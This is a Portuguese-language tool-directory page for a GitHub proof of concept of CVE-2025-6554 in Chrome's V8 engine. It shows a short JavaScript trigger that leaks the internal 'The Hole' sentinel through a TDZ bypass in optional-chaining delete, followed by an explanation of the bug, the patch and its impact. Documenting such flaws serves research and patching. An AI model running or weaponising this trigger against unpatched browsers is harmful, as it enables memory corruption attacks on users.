Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-6554 — Exploit de prova de conceito para CVE-2025-6554: confusão de tipo no motor JavaScript V8 através de bypass de TDZ no delete de encadeamento opcional, permitindo a fuga de The Hole para corrupção de memória. | Kitploit
Ferramentas/GitHubGitHub/pwntoday/cve-2025-6554
Análise de VulnerabilidadesExploraçãoPapers e PesquisaAprendizado e EducaçãoExploração de Binários
GitHubpwntoday/cve-2025-6554

CVE-2025-6554

Exploit de prova de conceito para CVE-2025-6554: confusão de tipo no motor JavaScript V8 através de bypass de TDZ no delete de encadeamento opcional, permitindo a fuga de The Hole para corrupção de memória.

Ver Repositório
2há 11 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-6554

root@kitploit:~
function leak_hole() {
    let x;
    delete x?.[y]?.a;
    return y;
    let y;
}
function pwn() {
    let hole = leak_hole();
    %DebugPrint(hole);
}
pwn();

Bug

Uma variável y foi acessada antes da declaração. Normalmente, isso deveria disparar um ReferenceError (TDZ), mas em versões antigas do V8, quando combinado com delete x?.[y], a verificação falhava e retornava o valor sentinela interno "The Hole".

Antes da Correção

O V8 verificava o TDZ apenas uma vez e, em seguida, assumia incorretamente que y era válido. Isso permitia que "The Hole" escapasse para o código do usuário.

Correção

O patch força uma nova verificação de TDZ (ThrowReferenceErrorIfHole) a cada acesso, garantindo que y antes da inicialização sempre lance exceção.

Impacto: Atacantes poderiam capturar "The Hole" e abusar dele para confusão de tipos, truques de pilha ou desvios de escopo.

Baixar ferramenta